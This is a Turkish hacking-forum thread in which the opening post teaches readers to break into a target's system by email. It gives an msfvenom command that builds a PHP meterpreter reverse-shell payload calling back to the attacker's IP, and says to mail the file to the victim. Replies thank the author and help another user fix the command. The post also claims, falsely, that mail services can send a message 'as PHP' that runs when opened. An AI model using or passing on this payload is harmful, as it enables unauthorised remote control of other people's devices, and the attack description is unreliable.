Email yoluyla cihaza sızma

Mrtzl

Üye
6 Ara 2020
52
27
Selam değerli Türk Hack Team ailesi bu gün sizlere güzel bir konum var.
Email aracılığıyla karşı sisteme sızacağız.
Bunu yapabilmek için;
1.)Herhangi bir linux tabanlı işletim sistemi
2.)Metasploit e ihtiyacınız var.
İlk olarak Terminalimize girip
msfvenom -p php/meterpreter_reverse_tcp \ LHOST=ipiniz LPORT=portnuz -f raw > payload.php
yazıyoruz .
Bildiğiniz üzere bir çok mail firmasının mesajı PHP şeklinde atma gibi bir seçeneği var seçeneği seçtikten sonra payloadı seçip karşı tarafa yollayalım eğer karşı taraf maili açarsa karşı tarafın sistemine meterpreter komutlarını
kullanabilirsiniz.

Rocemis

Üye
24 May 2022
145
52
Bunu yapabilmek için;
msfvenom -p php/meterpreter_reverse_tcp \ LHOST=ipiniz LPORT=portnuz -f raw > payload.php
yazıyoruz .
Bildiğiniz üzere bir çok mail firmasının mesajı PHP şeklinde atma gibi bir seçeneği var seçeneği seçtikten sonra payloadı seçip karşı tarafa yollayalım eğer karşı taraf maili açarsa karşı tarafın sistemine meterpreter komutlarını
kullanabilirsiniz.
Güzel bilgi eline sağlık

ATE$

Katılımcı Üye
9 Kas 2021
383
169
Siber Şubede geziyor.
Bunu yapabilmek için;
yazıyoruz .
kullanabilirsiniz.
Helal başarılarının devamını beklerim✔️

p3room

Yeni üye
21 Haz 2020
3
0
merhabalar terminale girip msfconsole-a girdikden sonra yazdiginiz komutu yaziyorum lakin bu sekil hata aliyorum:
[-] No platform was selected, choosing Msf::Module::platform::pHP from the payload
[-] No arch selected, selecting arch: php from the payload

heredotcan

Katılımcı Üye
28 Ağu 2008
675
148
merhabalar terminale girip msfconsole-a girdikden sonra yazdiginiz komutu yaziyorum lakin bu sekil hata aliyorum:
[-] No platform was selected, choosing Msf::Module::platform::pHP from the payload
[-] No arch selected, selecting arch: php from the payload
msfconsol içinde yazmıcaksın msfvenom aracı ile payload oluşturacan orda yazanı direk kopyala terminale yapıştır Host ile portu kendine göre ayarla

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.